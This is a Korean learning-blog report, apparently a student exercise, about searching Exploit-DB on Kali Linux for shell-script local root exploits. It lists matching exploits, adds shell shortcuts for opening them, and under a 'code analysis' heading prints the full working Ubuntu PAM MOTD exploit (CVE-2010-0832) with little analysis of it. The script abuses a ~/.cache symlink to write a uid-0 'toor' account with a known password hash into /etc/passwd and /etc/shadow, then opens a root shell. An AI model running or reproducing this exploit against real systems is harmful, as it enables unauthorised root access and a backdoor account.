본문 바로가기

Learning/└보고서

Shell Scripts Report Ⅱ

 

 

쉘 스크립트 코드 분석

 

 

 

 

 

 

 

INDEX

------------------------------

1. 네트워크 설정 확인

2. Exploit DB 업데이트

3. 공격용 쉘스크립트 검색

4. 편리한 기능 설정

5. 코드 분석

------------------------------

 

 

 

 

사용시스템

- KaliLinux

 

 

(1) 네트워크 설정 확인

Exploit DB 업데이트 작업을 하기 위해서 네트워크 설정을 확인한다.

외부로 통신이 가능해야 한다.

 

# ifconfig

# netstat -nr

# cat /etc/resolv.conf

# nslookup www.daum.net

 

 

(2) exploit DB 업데이트

# ls /usr/share/exploitdb/platforms

aix cfm irix minix palm_os tru64

android cgi java mips php ultrix

arm freebsd jsp multiple plan9 unix

asp freebsd_x86 lin_amd64 netbsd_x86 qnx unixware

atheos freebsd_x86-64 lin_x86 netware sco webapps

beos generator lin_x86-64 novell sco_x86 win32

bsd hardware linux openbsd sh4 win64

bsd_ppc hp-ux linux_mips openbsd_x86 solaris windows

bsd_x86 immunix linux_ppc osx solaris_sparc

bsdi_x86 ios linux_sparc osx_ppc solaris_x86

 

# git clone https://github.com/offensive-security/exploit-database

5 ~ 10분정도 걸린다.

 

 

 

 

(3) 공격용 코드 중 쉘스크립트 검색

# searchsploit linux local | egrep '.sh' | grep Root

dump 0.4b15 Local Root Exploit                                                   | /linux/local/193.sh

vixie-cron Local Root Exploit                                                    | /linux/local/203.sh

CDRDAO Local Root Exploit                                                        | /linux/local/434.sh

Operator Shell (osh) 1.7-12 Local Root Exploit                                   | /linux/local/788.pl

Exim <= 4.42 Local Root Exploit                                                  | /linux/local/796.sh

Linux Mandrake <= 10.2 cdrdao Local Root Exploit (unfixed)                       | /linux/local/997.sh

Operator Shell (osh) 1.7-13 Local Root Exploit                                   | /linux/local/1154.pl

Qpopper <= 4.0.8 (poppassd) Local Root Exploit (linux)                           | /linux/local/1229.sh

Operator Shell (osh) 1.7-14 Local Root Exploit                                   | /linux/local/1300.sh

Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)             | /linux/local/2011.sh

Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit                            | /linux/local/2016.sh

liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit                     | /linux/local/2144.sh

Openswan <= 2.4.12/2.6.16 Insecure Temp File Creation Root Exploit               | /linux/local/9135.sh

Ubuntu PAM MOTD Local Root Exploit                                              | /linux/local/14339.sh

systemtap - Local Root Privilege Escalation Vulnerability                        | /linux/local/15620.sh

Calibre E-Book Reader Local Root Exploit                                         | /linux/local/18064.sh

Calibre E-Book Reader Local Root Exploit                                         | /linux/local/18071.sh

Calibre E-Book Reader Local Root Race Condition Exploit                          | /linux/local/18072.sh

Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability     | /linux/local/21227.sh

H-Sphere Webshell 2.4 - Local Root Exploit                                       | /linux/local/22128.c

 

 

 

(4) 편리한 기능 설정

코드를 분석할 스크립트는 다음과 같다."Ubuntu PAM MOTD Local Root Exploit | /linux/local/14339.sh"-> /usr/share/exploitdb/platforms/linux/local/14339.sh

 

# vi ~/.bashrc

..... (중략) .....

#

# Sfecific Configuration

#

export E=/usr/share/exploitdb/platforms

 

# . ~/.bashrc

# vi $E/linux/local/14339.sh

 

or

 

# vi ~/.bashrc

..... (중략) .....

E() {

vi /usr/share/exploitdb/platforms$1

}

 

# . ~/.bashrc

# E /linux/local/14339.sh

 

or

 

# vi E.sh

#!/bin/bash

 

vi /usr/share/exploitdb/platforms$1

 

# E.sh /linux/local/14339.sh

 

 

 

 

 

(5) 코드 분석

 

# E /linux/local/14339.sh

#!/bin/bash

#

# Exploit Title: Ubuntu PAM MOTD local root

# Date: July 9, 2010

# Author: Anonymous

# Software Link: http://packages.ubuntu.com/

# Version: pam-1.1.0

# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)

# CVE: CVE-2010-0832

# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i

# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen

#

# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.

# Does not prompt for login by creating temporary SSH key and authorized_keys entry.

#

# user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh

# [*] Ubuntu PAM MOTD local root

# [*] Backuped /home/user/.ssh/authorized_keys

# [*] SSH key set up

# [*] Backuped /home/user/.cache

# [*] spawn ssh

# [+] owned: /etc/passwd

# [*] spawn ssh

# [+] owned: /etc/shadow

# [*] Restored /home/user/.cache

# [*] Restored /home/user/.ssh/authorized_keys

# [*] SSH key removed

# [+] Success! Use password toor to get root

# Password:

# root@ubuntu:/home/user# id

# uid=0(root) gid=0(root) groupes=0(root)

#

P='toor:x:0:0:root:/root:/bin/bash'

S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'

echo "[*] Ubuntu PAM MOTD local root"

 

[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1

[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1

[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1

backup() {

[ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak

[ -e "$1" ] || return 0

mv "$1"{,.bak} || return 1

echo "[*] Backuped $1"

}

 

restore() {

[ -e "$1" ] && rm -rf "$1"

[ -e "$1".bak ] || return 0

mv "$1"{.bak,} || return 1

echo "[*] Restored $1"

}

key_create() {

backup ~/.ssh/authorized_keys

ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1

[ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }

mv "$KEY.pub" ~/.ssh/authorized_keys || return 1

echo "[*] SSH key set up"

}

key_remove() {

rm -f "$KEY"

restore ~/.ssh/authorized_keys

echo "[*] SSH key removed"

}

own() {

[ -e ~/.cache ] && rm -rf ~/.cache

ln -s "$1" ~/.cache || return 1

echo "[*] spawn ssh"

ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true

[ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }

echo "[+] owned: $1"

}

bye() {

key_remove

exit 1

}

KEY="$(mktemp -u)"

key_create || { echo "[-] Failed to setup SSH key"; exit 1; }

backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }

own /etc/passwd && echo "$P" >> /etc/passwd

own /etc/shadow && echo "$S" >> /etc/shadow

restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }

key_remove

echo "[+] Success! Use password toor to get root"

su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \

chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor

 

 

 

 

 

'Learning > └보고서' 카테고리의 다른 글

DNS Spoofing report  (0) 2016.12.27
Yasca program Report  (0) 2016.12.27
Shell Scripts Report  (0) 2016.12.11
Googling Report  (0) 2016.12.10